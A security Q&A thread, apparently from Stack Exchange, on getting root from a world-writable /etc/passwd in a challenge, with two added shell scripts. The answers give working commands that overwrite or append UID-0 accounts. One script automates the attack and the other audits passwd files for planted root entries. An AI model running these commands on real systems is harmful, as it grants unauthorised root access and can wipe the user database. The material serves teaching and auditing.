11

If I have a world-writable /etc/passwd file on a system, how can I escalate my privileges to root? I am currently an underprivileged user. The underlying OS is CentOS 7.2, in case you are wondering.

I know that the passwd file is not normally world-writable; I am doing a challenge that has this scenario.

Any steps to exploitation will be greatly helpful.

Airbourne
  • I recommend that you take a closer look at what the columns in the passwd file mean, i.e. if there is a difference between root and a non-privileged user and what this difference means. – Steffen Ullrich Feb 19 '17 at 11:20

4 Answers

23

Passwords are normally stored in /etc/shadow, which is not readable by users. However, historically, they were stored in the world-readable file /etc/passwd along with all account information. For backward compatibility, if a password hash is present in the second column in /etc/passwd, it takes precedence over the one in /etc/shadow.

Historically, an empty second field in /etc/passwd means that the account has no password, i.e. anybody can log in without a password (used for guest accounts). This is sometimes disabled. If passwordless accounts are disabled, you can put the hash of a password of your choice. You can use the crypt function to generate password hashes, for example perl -le 'print crypt("foo", "aa")' to set the password to foo.

It's possible to gain root access even if you can only append to /etc/passwd and not overwrite the contents. That's because it's possible to have multiple entries for the same user, as long as they have different names — users are identified by their ID, not by their name, and the defining feature of the root account is not its name but the fact that it has user ID 0. So you can create an alternate root account by appending a line that declares an account with another name, a password of your choice and user ID 0.

Gilles 'SO- stop being evil'
  • Hi @Gilles, do you know if the same hashing algorithm is used to store password hashes in /etc/passwd and /etc/shadow? From my understanding, crypt is used for /etc/shadow, while some other algorithm is used for /etc/passwd? – Shuzheng May 03 '19 at 07:42
  • @Shuzheng There's no difference between `/etc/passwd` and `/etc/shadow`. Both use the `crypt` function. The `crypt` function supports multiple algorithms; it chooses based on the salt that you pass to it. – Gilles 'SO- stop being evil' May 03 '19 at 08:20
  • If the crypt function supports multiple algorithms, how does a password verifier know which algorithm was used to compute the hash? Also, if the crypt function were to be extended, would it break things? – Shuzheng May 03 '19 at 09:19
  • @Shuzheng The hash starts with some characters that indicate the algorithm. Check the `crypt(3)` man page, e.g. [on Linux](http://man7.org/linux/man-pages/man3/crypt.3.html). – Gilles 'SO- stop being evil' May 03 '19 at 09:51
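The answer above boils down to three checks on a passwd line: is the UID 0, what is in the second field, and where does the shell point. Here is an added example, not part of the answer, that turns those checks into a small POSIX shell audit you can run on a real or captured /etc/passwd. The sample file it builds is constructed (the `aaKNIEDOaueR6` value is crypt("foo", "aa"), as the perl one-liner above produces); the FINDING wording and the "shell must live under /bin, /sbin or /usr" heuristic are this script's own assumptions, not anything the page states.

```shell
#!/bin/sh
# Added example (not from the answer above): audit a passwd-format file for the
# conditions the answer describes. The sample file is constructed; the FINDING
# wording and the /bin,/sbin,/usr shell heuristic are assumptions of this script.

# True when the file has the "other write" bit set (the challenge's premise).
is_world_writable() {
    [ -n "$(find "$1" -prune -perm -002 2>/dev/null)" ]
}

# Print one FINDING line per indicator of a planted root account:
#   - the file itself is world-writable
#   - a UID-0 entry not named root (users are identified by UID, not name)
#   - a UID-0 entry whose password field is empty (passwordless login) or is a
#     hash carried in passwd itself (which wins over /etc/shadow)
#   - a UID-0 entry whose login shell lives outside /bin, /sbin or /usr
audit_passwd() {
    is_world_writable "$1" && echo "FINDING: $1 is world-writable"
    awk -F: '
        NF < 7 { print "FINDING: malformed line " NR ": " $0; next }
        $3 == 0 {
            if ($1 != "root")
                print "FINDING: extra UID-0 account " $1
            if ($2 == "")
                print "FINDING: UID-0 account " $1 " has an empty password field"
            else if ($2 != "x" && $2 !~ /^[!*]/)
                print "FINDING: UID-0 account " $1 " carries a password hash in passwd itself"
            if ($7 !~ /^\/(bin|sbin|usr)\//)
                print "FINDING: UID-0 account " $1 " uses shell " $7 " outside the system directories"
        }' "$1"
}

# Number of FINDING lines for a file (0 means nothing suspicious).
finding_count() {
    audit_passwd "$1" | awk 'END { print NR }'
}

# Constructed sample: what /etc/passwd might look like after the append trick.
# aaKNIEDOaueR6 is crypt("foo", "aa"), as the perl one-liner in the answer produces.
make_sample() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
airbourne:x:1000:1000::/home/airbourne:/bin/bash
toor:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash
guest::0:0:guest:/root:/bin/sh
EOF
}

# Demo: audit the constructed sample (four FINDING lines), then the live file.
sample=$(mktemp) && make_sample "$sample" && chmod 644 "$sample"
audit_passwd "$sample"
rm -f "$sample"
[ -r /etc/passwd ] && audit_passwd /etc/passwd
```

On the sample, `toor` is reported twice (extra UID-0 name, hash stored in passwd) and `guest` twice (extra UID-0 name, empty password field); `root` with an `x` and `/bin/bash` produces nothing. The permission test uses `find -perm -002` rather than `test -w` because `-w` only tells you whether the current user can write, which is always true for root and says nothing about other users.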
12

Just type:

echo root::0:0:root:/root:/bin/bash > /etc/passwd

su

and you are root.

(Removing the x means root no longer requires a password; you can use the sed command instead of echo, but this is enough to get a root shell.)

schroeder
  • Doing this constitutes an instant DoS attack against the server in question, because it overwrites the entire user database so that all the accounts other than your new root no longer exist. You probably want to use ">> /etc/passwd" rather than "> /etc/passwd". Also, any Unix administrator worthy of the title will never allow world write to the /etc/passwd file. – Mike McManus Sep 28 '17 at 21:28
  • Just an update with acknowledgement from the practical side. Machine tested: Ubuntu 16.04.3, Kernel 4.13.0-36. `$ echo "toor::0:0:toor:/root:/bin/bash" >> /etc/passwd` This doesn't work on actual Linuxes anymore. An empty password leads to "Authentication failure". `$ perl -le 'print crypt("foo", "aa")'` prints `aaKNIEDOaueR6`; then `$ echo "toor1:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash" >> /etc/passwd` This works. Credentials "toor1/foo" are accepted, providing a root shell (in a real pentest, though, I would use a more complex password in case the system has a password policy in place). – dtrizna Jun 01 '18 at 05:54
  • @MikeMcManus The server doesn't necessarily intend to make it writable. Shortly after "dirtycow" was disclosed, I used it to get root on a system by overwriting the `/etc/passwd` file (after accidentally corrupting it some and almost bringing the whole system down...). – forest Jun 01 '18 at 13:35
3

You can use this non-destructive method:

# to generate hash of the password
openssl passwd mrcake
hKLD3431415ZE

# to create a second root user with "mrcake" password
echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd

# to switch to root2
su root2
Password: mrcake 
mr guest
  • Your answer is a bit wrong, since your generated hash doesn't match the one inserted for `root`. I guess you accidentally noticed that you need to include the username as password salt. – Shuzheng May 03 '19 at 07:25
  • @Shuzheng mr guest is not wrong. If you run the command he suggested, `openssl passwd mrcake`, with no username or salt, you get a different hash every time. If you take your generated hash from that command, with no username or salt, and substitute it in the command to add the new user to the passwd file, `echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd`, then try to su to that user with the password used to generate the hash you used, it works. – John Lally Jul 01 '20 at 15:36
  • @JohnLally - how would Linux be able to verify the password, if a different hash is generated each time? – Shuzheng Jul 02 '20 at 17:25
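The two answers above show the same move (append a second UID-0 line, then `su`), and the comments show the two ways it goes wrong: clobbering the file with `>` instead of `>>`, and an empty password field that current PAM setups reject. Here is an added example, not part of either answer, that wraps the append in the checks a tester would want before touching a live file: refuse if the file is not writable or the name already exists, refuse a name or hash containing `:` (it would inject extra fields), keep a backup outside /etc, append with `>>` only, and read the entry back before reporting success. The hash helper assumes `openssl passwd -6` (OpenSSL 1.1.1 or later) and falls back to the perl one-liner from the comments; the backup path, function names and the demo file are this script's own choices.

```shell
#!/bin/sh
# Added example (not part of either answer): the append-only variant of the
# trick with the rails a tester would want before touching a live passwd file.
# Function names, the backup location and the demo file are my own choices.

# crypt(3) hash for a password, using whatever tool is present: openssl's
# SHA-512 scheme ($6$) if available (assumes OpenSSL 1.1.1+), otherwise perl's
# crypt() with the traditional DES scheme and salt "aa", as in the comment above.
make_hash() {
    if command -v openssl >/dev/null 2>&1; then
        openssl passwd -6 "$1"
    else
        perl -le 'print crypt($ARGV[0], "aa")' -- "$1"
    fi
}

# Names of every account with UID 0 in a passwd-format file.
uid0_names() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# Append NAME with HASH as a second UID-0/GID-0 account to FILE (default
# /etc/passwd). Refuses unless the file is writable, the name is unused and
# neither value contains ':'; keeps a backup outside /etc; appends with >>
# (never >, which would wipe every other account); verifies the new line
# parses back with UID 0 before returning success.
add_root_alias() {
    name=$1; hash=$2; file=${3:-/etc/passwd}
    backup="${TMPDIR:-/tmp}/passwd.bak.$$"
    case "$name$hash" in
        *:*) echo "refusing: ':' in name or hash" >&2; return 1 ;;
    esac
    [ -w "$file" ] || { echo "refusing: $file is not writable by $(id -un)" >&2; return 1; }
    if awk -F: -v n="$name" '$1 == n { found = 1 } END { exit !found }' "$file"; then
        echo "refusing: account $name already exists in $file" >&2; return 1
    fi
    cp "$file" "$backup" || { echo "refusing: cannot back up to $backup" >&2; return 1; }
    before=$(awk 'END { print NR }' "$file")
    printf '%s:%s:0:0:%s:/root:/bin/bash\n' "$name" "$hash" "$name" >> "$file"
    after=$(awk 'END { print NR }' "$file")
    if [ "$after" -ne $((before + 1)) ]; then
        echo "line count went from $before to $after, restoring $backup" >&2
        cp "$backup" "$file"
        return 1
    fi
    awk -F: -v n="$name" -v h="$hash" \
        '$1 == n && $2 == h && $3 == 0 && $4 == 0 { ok = 1 } END { exit !ok }' "$file" \
        || { echo "new entry did not parse back as expected" >&2; return 1; }
    echo "added $name (UID 0) to $file; backup in $backup; now: su $name"
}

# Demo on a constructed copy, never on the real file.
demo=$(mktemp)
printf 'root:x:0:0:root:/root:/bin/bash\nairbourne:x:1000:1000::/home/airbourne:/bin/bash\n' > "$demo"
add_root_alias toor1 aaKNIEDOaueR6 "$demo"     # hash of "foo" from the comment above
uid0_names "$demo"                              # root, toor1
rm -f "$demo" "${TMPDIR:-/tmp}/passwd.bak.$$"
```

Usage on the challenge box would be `add_root_alias toor1 "$(make_hash foo)"` followed by `su toor1`. The `-w` check is only meaningful for an unprivileged caller (it is always true for root), which is why the read-back with awk is the real success test; the line-count comparison is there to catch the `>` mistake from the comments if someone edits the append line.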
1

You can redirect the root shell to a program in your home. Such a program is run as root, and in it you can grant yourself privileges (e.g. by setting setuid), or just do what you want. Considering that various processes will run root shells, you quickly get root.